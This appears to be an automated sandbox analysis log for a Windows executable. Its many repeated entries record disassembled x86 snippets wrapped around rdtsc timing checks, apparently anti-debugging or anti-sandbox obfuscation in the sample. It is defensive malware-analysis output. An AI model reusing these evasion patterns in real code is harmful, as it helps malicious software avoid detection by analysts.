                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 4CDCB3 second address: 4CDCB7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 4CDCB7 second address: 4CDCD4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4EF0C7988Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jmp 00007F4EF0C7988Ch 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 4D87FD second address: 4D8822 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F4EF0C09E1Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [eax] 0x0000000c push ecx 0x0000000d jnp 00007F4EF0C09E18h 0x00000013 pop ecx 0x00000014 mov dword ptr [esp+04h], eax 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 4D8822 second address: 4D8827 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 4D8827 second address: 4D882D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 4D88F4 second address: 4D88FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F4EF0C79886h 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 4D88FF second address: 4D8905 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 4D8905 second address: 4D8909 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 4D8909 second address: 4D8930 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [esp+04h] 0x0000000c jl 00007F4EF0C09E20h 0x00000012 jmp 00007F4EF0C09E1Ah 0x00000017 mov eax, dword ptr [eax] 0x00000019 pushad 0x0000001a jc 00007F4EF0C09E1Ch 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 4D8930 second address: 4D8951 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 jnp 00007F4EF0C79886h 0x0000000b jnp 00007F4EF0C79886h 0x00000011 popad 0x00000012 popad 0x00000013 mov dword ptr [esp+04h], eax 0x00000017 push eax 0x00000018 push edx 0x00000019 js 00007F4EF0C79888h 0x0000001f pushad 0x00000020 popad 0x00000021 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 4DC98E second address: 4DC9F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4EF0C09E1Dh 0x00000009 popad 0x0000000a push ecx 0x0000000b pushad 0x0000000c popad 0x0000000d pop ecx 0x0000000e jmp 00007F4EF0C09E28h 0x00000013 jmp 00007F4EF0C09E1Ah 0x00000018 popad 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007F4EF0C09E23h 0x00000020 jmp 00007F4EF0C09E28h 0x00000025 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 4DC9F4 second address: 4DC9FA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 4DC9FA second address: 4DCA0A instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jbe 00007F4EF0C09E16h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 4DCA0A second address: 4DCA0E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 4DCE5C second address: 4DCE60 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 4DCE60 second address: 4DCE6E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnp 00007F4EF0C7988Ch 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 4DD137 second address: 4DD14F instructions: 0x00000000 rdtsc 0x00000002 jl 00007F4EF0C09E16h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jg 00007F4EF0C09E1Eh 0x00000010 push ebx 0x00000011 pop ebx 0x00000012 jp 00007F4EF0C09E16h 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 4DD14F second address: 4DD155 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 4DD155 second address: 4DD15B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 4DD15B second address: 4DD15F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 4DD3DE second address: 4DD3E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 4DD3E4 second address: 4DD3EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 4DD3EC second address: 4DD3F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 4E2844 second address: 4E284E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F4EF0C79886h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 4E2C63 second address: 4E2C8E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 jmp 00007F4EF0C09E28h 0x0000000a js 00007F4EF0C09E22h 0x00000010 jbe 00007F4EF0C09E1Ch 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 4E2F6C second address: 4E2F7C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 je 00007F4EF0C79886h 0x0000000a jng 00007F4EF0C79886h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 4E322D second address: 4E323A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 je 00007F4EF0C09E16h 0x0000000c popad 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 4E33B6 second address: 4E33BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 4E33BA second address: 4E33C0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 4E33C0 second address: 4E33C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 4E33C4 second address: 4E33D2 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jns 00007F4EF0C09E16h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 4E227A second address: 4E227F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 4E6B7D second address: 4E6BAB instructions: 0x00000000 rdtsc 0x00000002 jl 00007F4EF0C09E1Eh 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a je 00007F4EF0C09E16h 0x00000010 pop edx 0x00000011 pop eax 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F4EF0C09E27h 0x00000019 pushad 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 4E6BAB second address: 4E6BC6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4EF0C79896h 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 4A9237 second address: 48DEEE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 nop 0x00000007 add edi, dword ptr [ebp+122D1DC0h] 0x0000000d clc 0x0000000e lea eax, dword ptr [ebp+12484F59h] 0x00000014 pushad 0x00000015 mov dword ptr [ebp+122D2A53h], ebx 0x0000001b and ebx, 23B54027h 0x00000021 popad 0x00000022 nop 0x00000023 push eax 0x00000024 push esi 0x00000025 jmp 00007F4EF0C09E1Eh 0x0000002a pop esi 0x0000002b pop eax 0x0000002c push eax 0x0000002d jg 00007F4EF0C09E24h 0x00000033 nop 0x00000034 push 00000000h 0x00000036 push edx 0x00000037 call 00007F4EF0C09E18h 0x0000003c pop edx 0x0000003d mov dword ptr [esp+04h], edx 0x00000041 add dword ptr [esp+04h], 00000015h 0x00000049 inc edx 0x0000004a push edx 0x0000004b ret 0x0000004c pop edx 0x0000004d ret 0x0000004e mov dword ptr [ebp+122D1D54h], edx 0x00000054 sbb edx, 46A2C6E0h 0x0000005a call dword ptr [ebp+122D3410h] 0x00000060 jmp 00007F4EF0C09E1Ch 0x00000065 pushad 0x00000066 push eax 0x00000067 push edx 0x00000068 pushad 0x00000069 popad 0x0000006a push eax 0x0000006b push edx 0x0000006c rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 4A948C second address: 4A9496 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F4EF0C7988Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 4A97D8 second address: 4A97DE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 4A9843 second address: 4A989B instructions: 0x00000000 rdtsc 0x00000002 je 00007F4EF0C79886h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ebx 0x0000000b jmp 00007F4EF0C79893h 0x00000010 pop ebx 0x00000011 popad 0x00000012 xor dword ptr [esp], 42EC9857h 0x00000019 and di, B42Ah 0x0000001e call 00007F4EF0C79889h 0x00000023 jp 00007F4EF0C79892h 0x00000029 jnc 00007F4EF0C7988Ch 0x0000002f push eax 0x00000030 push eax 0x00000031 push edx 0x00000032 push edi 0x00000033 jmp 00007F4EF0C7988Ch 0x00000038 pop edi 0x00000039 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 4A989B second address: 4A98CC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 jc 00007F4EF0C09E16h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov eax, dword ptr [esp+04h] 0x00000012 jmp 00007F4EF0C09E28h 0x00000017 mov eax, dword ptr [eax] 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c pushad 0x0000001d popad 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 4A99D7 second address: 4A99DC instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 4A9BC3 second address: 4A9BC7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 4A9CFB second address: 4A9D23 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 jmp 00007F4EF0C7988Ch 0x0000000b nop 0x0000000c sub dword ptr [ebp+122D2F04h], ebx 0x00000012 mov dx, bx 0x00000015 push 00000004h 0x00000017 push esi 0x00000018 mov cl, F3h 0x0000001a pop ecx 0x0000001b push eax 0x0000001c pushad 0x0000001d push eax 0x0000001e push edx 0x0000001f push eax 0x00000020 pop eax 0x00000021 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 4AA10A second address: 4AA114 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F4EF0C09E16h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 4EE08B second address: 4EE0AB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4EF0C79896h 0x00000007 push eax 0x00000008 push edx 0x00000009 jbe 00007F4EF0C79886h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 4AA2B6 second address: 4AA2BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 4EE1E6 second address: 4EE1EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 4EE1EB second address: 4EE1F5 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F4EF0C09E1Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 4EE4AC second address: 4EE4B1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 4EE4B1 second address: 4EE4D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jo 00007F4EF0C09E16h 0x0000000c popad 0x0000000d pushad 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 jnp 00007F4EF0C09E16h 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 push eax 0x0000001a push edx 0x0000001b jp 00007F4EF0C09E18h 0x00000021 push edi 0x00000022 pop edi 0x00000023 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 4EE61E second address: 4EE64A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F4EF0C79886h 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F4EF0C7988Bh 0x00000011 jmp 00007F4EF0C79895h 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 4EE64A second address: 4EE64E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 4EE64E second address: 4EE65E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F4EF0C79886h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 4EE65E second address: 4EE668 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F4EF0C09E16h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 4EE902 second address: 4EE906 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 4EE906 second address: 4EE90C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 4EE90C second address: 4EE91A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jl 00007F4EF0C7988Ch 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 4EE91A second address: 4EE922 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 4EE922 second address: 4EE937 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4EF0C79891h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 4EEA7C second address: 4EEA86 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 je 00007F4EF0C09E16h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 4EEA86 second address: 4EEAA7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F4EF0C79897h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 4EEAA7 second address: 4EEAAB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 4EEAAB second address: 4EEAB8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 4EEAB8 second address: 4EEAE3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4EF0C09E1Bh 0x00000009 jne 00007F4EF0C09E16h 0x0000000f jmp 00007F4EF0C09E25h 0x00000014 popad 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 4EEAE3 second address: 4EEAE9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 4EEAE9 second address: 4EEAFD instructions: 0x00000000 rdtsc 0x00000002 jng 00007F4EF0C09E16h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jbe 00007F4EF0C09E16h 0x00000012 push ebx 0x00000013 pop ebx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 4EEAFD second address: 4EEB01 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 4F4660 second address: 4F4681 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push esi 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F4EF0C09E25h 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 4F4681 second address: 4F4685 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 4F4685 second address: 4F468B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 4F3337 second address: 4F3346 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 pushad 0x00000006 popad 0x00000007 jg 00007F4EF0C79886h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 4F3659 second address: 4F365D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 4F365D second address: 4F3661 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 4F40BC second address: 4F40C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F4EF0C09E18h 0x0000000a push edx 0x0000000b pop edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 4F96C6 second address: 4F96CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 4F96CA second address: 4F96D0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 4F96D0 second address: 4F96DA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnc 00007F4EF0C79886h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 4F96DA second address: 4F96E6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push esi 0x00000009 pop esi 0x0000000a push edi 0x0000000b pop edi 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 4F8F6A second address: 4F8F87 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F4EF0C79886h 0x00000008 jmp 00007F4EF0C7988Ch 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pop esi 0x00000010 push eax 0x00000011 push edx 0x00000012 push ecx 0x00000013 pushad 0x00000014 popad 0x00000015 pop ecx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 4F8F87 second address: 4F8F8D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 4F9122 second address: 4F9152 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jno 00007F4EF0C7989Fh 0x0000000e jnp 00007F4EF0C7989Ch 0x00000014 pushad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 4F9152 second address: 4F9158 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 4F9292 second address: 4F92AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 pop esi 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b jne 00007F4EF0C79886h 0x00000011 jmp 00007F4EF0C7988Ch 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 4F92AF second address: 4F92B3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 4F92B3 second address: 4F92C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jl 00007F4EF0C79888h 0x0000000c push eax 0x0000000d push edx 0x0000000e push esi 0x0000000f pop esi 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 5006CB second address: 5006D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 5006D3 second address: 5006E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 jg 00007F4EF0C79886h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 500807 second address: 50083D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F4EF0C09E1Ch 0x0000000b pushad 0x0000000c jmp 00007F4EF0C09E1Bh 0x00000011 jmp 00007F4EF0C09E26h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 500C60 second address: 500C64 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
